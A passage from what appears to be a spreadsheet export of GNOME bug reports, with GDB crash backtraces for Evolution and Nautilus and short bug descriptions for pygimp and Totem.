No symbol table info available.
#1  0xb6de24c7 in poll () from /lib/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb6ea2a5f in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x08385ee8 in ?? ()
No symbol table info available.
#4  0x00000002 in ?? ()
No symbol table info available.
#5  0xffffffff in ?? ()
No symbol table info available.
#6  0x08385ee8 in ?? ()
No symbol table info available.
#7  0x00000002 in ?? ()
No symbol table info available.
#8  0xb6f155f8 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0xb6f15620 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0xb4544294 in ?? ()
No symbol table info available.
#11 0x00000001 in ?? ()
No symbol table info available.
#12 0x00000001 in ?? ()
No symbol table info available.
#13 0x0837fc70 in ?? ()
No symbol table info available.
#14 0x08385ee8 in ?? ()
No symbol table info available.
#15 0xb6de2450 in ?? () from /lib/i686/cmov/libc.so.6
No symbol table info available.
#16 0xb7bfe3e0 in ?? () from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#17 0xb7bfc970 in ?? () from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#18 0xb6ec6da2 in g_thread_self () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#19 0xb6ea2dc7 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#20 0xb6fa7774 in ?? () from /usr/lib/libnm_glib.so.0
No symbol table info available.
#21 0x08387780 in ?? ()
No symbol table info available.
#22 0x08384f50 in ?? ()
No symbol table info available.
#23 0x08334d60 in ?? ()
No symbol table info available.
#24 0xb6f15248 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#25 0xb6f15248 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#26 0x08384f50 in ?? ()
No symbol table info available.
#27 0xb4544328 in ?? ()
No symbol table info available.
#28 0xb6ec730f in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#29 0x0837f890 in ?? ()
No symbol table info available.
#30 0x08384f50 in ?? ()
No symbol table info available.
#31 0xffffffd8 in ?? ()
No symbol table info available.
#32 0xb4544324 in ?? ()
No symbol table info available.
#33 0xb6e3239e in ?? () from /lib/i686/cmov/libc.so.6
No symbol table info available.
#34 0x08334d60 in ?? ()
No symbol table info available.
#35 0xb7bfc970 in ?? () from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#36 0xb7c0aff4 in ?? () from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#37 0x00000000 in ?? ()
No symbol table info available.
Thread 6 (Thread 0xb1d1fb90 (LWP 18441)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7bff015 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6e7adc2 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x083a1c08 in ?? ()
No symbol table info available.
#4  0x0821c3b0 in ?? ()
No symbol table info available.
#5  0xb1d1f2c8 in ?? ()
No symbol table info available.
#6  0xb6e7b0cf in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0xb7b42cb5 in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#8  0xb7b4339c in ?? () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#9  0x08151ac8 in ?? ()
No symbol table info available.
#10 0x08611aa8 in ?? ()
No symbol table info available.
#11 0x00000000 in ?? ()
No symbol table info available.
Thread 5 (Thread 0xb2520b90 (LWP 18443)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7bff015 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6e7adc2 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x0845bfc0 in ?? ()
No symbol table info available.
#4  0x08209ef0 in ?? ()
No symbol table info available.
#5  0xb25202c8 in ?? ()
No symbol table info available.
#6  0xb6e7b0cf in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0xb7b42cb5 in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#8  0xb7b4339c in ?? () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#9  0x08151b18 in ?? ()
No symbol table info available.
#10 0x0835b988 in ?? ()
No symbol table info available.
#11 0x00000000 in ?? ()
No symbol table info available.
Thread 4 (Thread 0xb2d21b90 (LWP 18446)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7bff015 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6e7adc2 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x085f60a0 in ?? ()
No symbol table info available.
#4  0x0821cae0 in ?? ()
No symbol table info available.
#5  0xb2d212c8 in ?? ()
No symbol table info available.
#6  0xb6e7b0cf in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0xb7b42cb5 in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#8  0xb7b4339c in ?? () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#9  0x08151ab0 in ?? ()
No symbol table info available.
#10 0x083647b8 in ?? ()
No symbol table info available.
#11 0x00000000 in ?? ()
No symbol table info available.
Thread 3 (Thread 0xb4d45b90 (LWP 18453)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6de24c7 in poll () from /lib/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb6ea2a5f in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x0863ec70 in ?? ()
No symbol table info available.
#4  0x00000001 in ?? ()
No symbol table info available.
#5  0xffffffff in ?? ()
No symbol table info available.
#6  0x0863ec70 in ?? ()
No symbol table info available.
#7  0x00000001 in ?? ()
No symbol table info available.
#8  0xb6f155f8 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0xb6f15620 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0xb4d45294 in ?? ()
No symbol table info available.
#11 0x00000001 in ?? ()
No symbol table info available.
#12 0x00000001 in ?? ()
No symbol table info available.
#13 0x0863e8d0 in ?? ()
No symbol table info available.
#14 0x0863ec70 in ?? ()
No symbol table info available.
#15 0xb6de2450 in ?? () from /lib/i686/cmov/libc.so.6
No symbol table info available.
#16 0xb7bfe3e0 in ?? () from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#17 0xb7bfc970 in ?? () from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#18 0xb6ec6da2 in g_thread_self () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#19 0xb6ea2dc7 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#20 0xb7c5b532 in ?? () from /usr/lib/libebook-1.2.so.9
No symbol table info available.
#21 0x0863ec18 in ?? ()
No symbol table info available.
#22 0x00000000 in ?? ()
No symbol table info available.
Thread 2 (Thread 0xb1200b90 (LWP 18455)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6de24c7 in poll () from /lib/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb6ea2a5f in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x08706000 in ?? ()
No symbol table info available.
#4  0x00000009 in ?? ()
No symbol table info available.
#5  0xffffffff in ?? ()
No symbol table info available.
#6  0x08706000 in ?? ()
No symbol table info available.
#7  0x00000009 in ?? ()
No symbol table info available.
#8  0xb6f155f8 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0xb6f15620 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0xb12002a4 in ?? ()
No symbol table info available.
#11 0x00000001 in ?? ()
No symbol table info available.
#12 0x00000001 in ?? ()
No symbol table info available.
#13 0x083e2ae8 in ?? ()
No symbol table info available.
#14 0x08706000 in ?? ()
No symbol table info available.
#15 0xb6de2450 in ?? () from /lib/i686/cmov/libc.so.6
No symbol table info available.
#16 0xb7bfe3e0 in ?? () from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#17 0xb7bfc970 in ?? () from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#18 0xb6ec6da2 in g_thread_self () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#19 0xb6ea2dc7 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#20 0xb77f29f0 in ?? () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#21 0x086f2a90 in ?? ()
No symbol table info available.
#22 0xb6f15248 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#23 0xb1200328 in ?? ()
No symbol table info available.
#24 0xb6ec730f in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#25 0x00000000 in ?? ()
No symbol table info available.
Thread 1 (Thread 0xb6784a80 (LWP 18425)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7c02fdb in waitpid () from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6ed56b4 in g_spawn_sync () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb6ed59cc in g_spawn_command_line_sync () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7e74268 in ?? () from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
No symbol table info available.
#5  0x0805e429 in ?? ()
No symbol table info available.
#6  0x0000000b in ?? ()
No symbol table info available.
#7  0x00000000 in ?? ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors (9 sec old) ---------------------
  (org.freedesktop.DBus.Error.ServiceUnknown) The name org.freedesktop.NetworkManager was not provided by any .service files
get chris@NelsonHomeInspections.co.uk pop://chris%40NelsonHomeInspections.co.uk@pop.1and1.co.uk/
Find Items 0
get chris@bifurcation.org.uk pop://chris%40bifurcation.org.uk@pop.1and1.co.uk/
Find Items 0
get lotto@bifurcation.org.uk pop://lotto%40bifurcation.org.uk@pop.1and1.co.uk/
Find Items 0
get chris.nelson-1stforhips pop://chris.nelson-1stforhips@mail.1stforhips.com/
Find Items 0
(evolution:18425): composer-WARNING **: autosave load filename = /home/chris/.evolution/.evolution-composer.autosave-A1RF8T
(evolution:18425): gtkhtml-WARNING **: Cannot create spell dictionary instance (iid:OAFIID:GNOME_Spell_Dictionary:0.3)
(evolution:18425): Bonobo-WARNING **: Activation exception 'Failed to activate 'OAFIID:GNOME_Spell_Control:0.3''
--------------------------------------------------</t>
  </si>
  <si>
    <t>GIMP-347535</t>
  </si>
  <si>
    <t>Gimp-Python</t>
  </si>
  <si>
    <t>pygimp file selector refuses to select directories</t>
  </si>
  <si>
    <t>The new file selector in pygimp refuses to select directories it will only
select files.
This makes any scripts that run in a directory useless.</t>
  </si>
  <si>
    <t>yosh</t>
  </si>
  <si>
    <t>carol.spears</t>
  </si>
  <si>
    <t>TOTEM-112922</t>
  </si>
  <si>
    <t>totem doesn't use the new native quicktime codec</t>
  </si>
  <si>
    <t>It seems totem doesn't use the new quicktime Sorenson 3 native codec that's
now in libxine beta 12. I tried renaming the quicktime DLLs to see if totem
would still play the trailers i have and it doesn't. On the other hand
xine (the frontend) doesn't play the trailers either but it's telling me
to upgrade the frontend (i'm using the latest on from freshrpms).</t>
  </si>
  <si>
    <t>TOTEM-394215</t>
  </si>
  <si>
    <t>Keyboard Open/Cancel in Open Location dialog</t>
  </si>
  <si>
    <t>Enter should trigger the Open button and Escape should trigger the Cancel button in the Open Location dialog.
Other information:
It's a problem on trunk and probably a candidate for gnome-love.</t>
  </si>
  <si>
    <t>NAUTILUS-85399</t>
  </si>
  <si>
    <t>nautilus crashes on closing the last windows after preferences had been opened</t>
  </si>
  <si>
    <t>Package: nautilus
Severity: normal
Version: 2.0.0
Synopsis: nautilus crashes on closing the last windows after preferences had been opened
Bugzilla-Product: nautilus
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.0.1)
Description:
Description of Problem:
If i opened the nautilus preferences then closed them (wether i changed
any of them or not) nautilus segfaults on closing the last application
window.
This does only happen if i don't use nautilus to draw the desktop.
Steps to reproduce the problem:
1. don't use nautilus to draw the desktop
2. start nautilus
3. bring up the preferences dialog and close it
4. close nautilus
Actual Results:
segfault
Expected Results:
clean exit
How often does this happen?
every time
Additional Information:
if i haven't opened the preferences dialog i get the following output
on the shell when i close nautilus:
(nautilus:12227): Bonobo-WARNING **: Leaked a total of 1 refs to 1
bonobo object(s)
** (nautilus:12227): WARNING **: CORBA_ORB_destroy: ORB still has 2
refs.
Debugging Information:
Backtrace was generated from '/usr/bin/nautilus'
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...[New
Thread 1024 (LWP 12246)]
[New Thread 2049 (LWP 12247)]
[New Thread 1026 (LWP 12248)]
[New Thread 2051 (LWP 12249)]
0x40c72449 in __wait4 () at __wait4:-1
	in __wait4
#0  0x40c72449 in __wait4 () at __wait4:-1
#1  0x40cfbb18 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40a0dc26 in waitpid () from /lib/libpthread.so.0
#3  0x4020b963 in gnome_scores_new () from /usr/lib/libgnomeui-2.so.0
#4  0x40a0b6f4 in pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x40a4e152 in g_strdup () from /usr/lib/libglib-2.0.so.0
#7  0x409f0859 in value_collect_string () from
/usr/lib/libgobject-2.0.so.0
#8  0x409deaee in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#9  0x409def3c in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#10 0x0807b972 in theme_selector_changed_callback ()
#11 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#12 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#13 0x409e0444 in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#14 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#15 0x409def3c in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#16 0x401268bf in eel_image_chooser_selection_changed ()
   from /usr/lib/libeel-2.so.2
#17 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#18 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#19 0x409e0444 in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#20 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#21 0x409df6da in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#22 0x40728406 in gtk_tree_store_clear () from
/usr/lib/libgtk-x11-2.0.so.0
#23 0x409e1b6c in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#24 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#25 0x409e0444 in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#26 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#27 0x409df6da in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#28 0x40712829 in gtk_tree_model_row_deleted ()
   from /usr/lib/libgtk-x11-2.0.so.0
#29 0x4066ade9 in gtk_list_store_remove () from
/usr/lib/libgtk-x11-2.0.so.0
#30 0x4066c656 in gtk_list_store_clear () from
/usr/lib/libgtk-x11-2.0.so.0
#31 0x401265cd in eel_image_chooser_clear () from
/usr/lib/libeel-2.so.2
#32 0x40126b18 in eel_image_chooser_destroy () from
/usr/lib/libeel-2.so.2
#33 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#34 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#35 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#36 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#37 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#38 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#39 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#40 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#41 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#42 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#43 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#44 0x405e92d4 in gtk_bin_get_type () from /usr/lib/libgtk-x11-2.0.so.0
#45 0x406a4e40 in gtk_scrolled_window_get_shadow_type ()
   from /usr/lib/libgtk-x11-2.0.so.0
#46 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#47 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
#48 0x406a4af7 in gtk_scrolled_window_get_shadow_type ()
   from /usr/lib/libgtk-x11-2.0.so.0
#49 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#50 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#51 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#52 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#53 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#54 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#55 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#56 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#57 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#58 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#59 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#60 0x405edfe8 in gtk_box_pack_end_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
#61 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#62 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
#63 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#64 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#65 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#66 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#67 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#68 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#69 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#70 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#71 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#72 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#73 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#74 0x405edfe8 in gtk_box_pack_end_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
#75 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#76 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
#77 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#78 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#79 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#80 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#81 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#82 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#83 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#84 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#85 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#86 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#87 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#88 0x405edfe8 in gtk_box_pack_end_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
#89 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#90 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
#91 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#92 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#93 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#94 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#95 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#96 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#97 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#98 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#99 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#100 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#101 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#102 0x405edfe8 in gtk_box_pack_end_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
#103 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#104 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
#105 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#106 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#107 0x409cbeee in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#108 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#109 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#110 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#111 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#112 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#113 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#114 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#115 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#116 0x4064358b in gtk_frame_get_label_align ()
   from /usr/lib/libgtk-x11-2.0.so.0
#117 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#118 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
#119 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#120 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#121 0x409cbeee in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#122 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#123 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#124 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#125 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#126 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#127 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#128 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#129 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#130 0x405edfe8 in gtk_box_pack_end_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
#131 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#132 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
#133 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#134 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#135 0x409cbeee in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#136 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#137 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#138 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#139 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#140 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#141 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#142 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#143 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#144 0x405edfe8 in gtk_box_pack_end_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
#145 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#146 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
#147 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#148 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#149 0x409cbeee in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#150 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#151 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#152 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#153 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#154 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#155 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#156 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#157 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#158 0x40680f9b in gtk_misc_get_padding () from
/usr/lib/libgtk-x11-2.0.so.0
#159 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#160 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
#161 0x40686a23 in gtk_notebook_set_menu_label_text ()
   from /usr/lib/libgtk-x11-2.0.so.0
#162 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#163 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#164 0x409cbeee in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#165 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#166 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#167 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#168 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#169 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#170 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#171 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#172 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#173 0x405edfe8 in gtk_box_pack_end_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
#174 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#175 0x40619af0 in gtk_container_set_reallocate_redraws ()
